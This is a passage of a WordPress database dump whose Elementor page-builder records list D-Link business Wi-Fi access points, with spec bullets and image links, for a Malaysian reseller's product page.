WiFiManager<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2360\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\\\" alt=\\\"\\\" width=\\\"510\\\" height=\\\"600\\\" \\/><\\/p><p>2.4GHz Wireless N300 Outdoor Access Point<\\/p><p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2361\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\\\" alt=\\\"\\\" width=\\\"510\\\" height=\\\"600\\\" \\/><\\/p><p>AC1750 Wireless Dual-Band PoE Access Point<\\/p><p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2362\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\\\" alt=\\\"\\\" width=\\\"510\\\" height=\\\"600\\\" \\/><\\/p><p>N600 Wireless Dual-Band PoE Access Point<\\/p><p>\\u2022 Simultaneous Dual Band Connectivity for high performance<\\/p><p>\\u2022 Support\\u00a0 up to\\u00a0 300 Mbps speed\\u00a0 in both 2.4 GHz and 5 GHz band<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet support<\\/p><p>\\u2022 Support Multiple operation mode \\u2013 AP, Client, WDS, WDS with AP<\\/p><p>\\u2022 Equipped with Rugged Metal &amp; Plenum-rated housing<\\/p><p>\\u2022 Built in Radius server and support Network Access Protection (NAP)<\\/p><p>\\u2022 Support Rogue AP Detection, Wireless Broadcast Scheduling<\\/p><p>\\u2022 Support Central Wi-Fi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2363\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\\\" alt=\\\"\\\" width=\\\"510\\\" height=\\\"600\\\" \\/><\\/p><p>AC1300 Wireless Dual-Band PoE Access Point<\\/p><p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2364\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\\\" alt=\\\"\\\" width=\\\"510\\\" height=\\\"600\\\" \\/><\\/p><p>N300 Wireless PoE Access Point<\\/p><p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ce36a6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"16bb526\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a8892e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"7b1ec0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3befd1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c79b115\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0a7395\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0e6f8e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62f238e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ecbb61f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89c052d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bee4f1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0dd89dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a8eceff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cea9196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"932549b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b9b1275\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"008ef23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"671f8ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"7a8833d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dbc3f40\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"93fc91a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d70abb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d3625d1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8c8530\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd07de7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9a1a792\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d96783a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3448,1480,'_elementor_version','2.5.14'),(3461,2632,'_elementor_version','0.4'),(4037,2727,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.19603197552398654579519643448293209075927734375;s:5:\"bytes\";i:13075;s:11:\"size_before\";i:107207;s:10:\"size_after\";i:94132;s:4:\"time\";d:0.6599999999999999200639422269887290894985198974609375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1191;s:11:\"size_before\";i:9374;s:10:\"size_after\";i:8183;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:4057;s:11:\"size_before\";i:32590;s:10:\"size_after\";i:28533;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.44000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:1612;s:11:\"size_before\";i:21662;s:10:\"size_after\";i:20050;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:6215;s:11:\"size_before\";i:43581;s:10:\"size_after\";i:37366;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}}}'),(3536,2642,'_wp_attached_file','2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg'),(3468,2633,'_wp_page_template','template-fullwidth.php'),(3469,2633,'_elementor_edit_mode','builder'),(3470,2633,'_elementor_template_type','post'),(3471,2633,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ce36a6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"16bb526\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a8892e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"7b1ec0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3befd1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c79b115\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0a7395\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0e6f8e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62f238e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ecbb61f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89c052d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bee4f1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0dd89dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a8eceff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cea9196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"932549b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b9b1275\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"008ef23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"671f8ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"7a8833d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dbc3f40\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"93fc91a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d70abb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d3625d1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8c8530\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd07de7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9a1a792\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d96783a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3472,2633,'_elementor_version','0.4'),(3482,2635,'_elementor_edit_mode','builder'),(3483,2635,'_elementor_template_type','post'),(3484,2635,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN 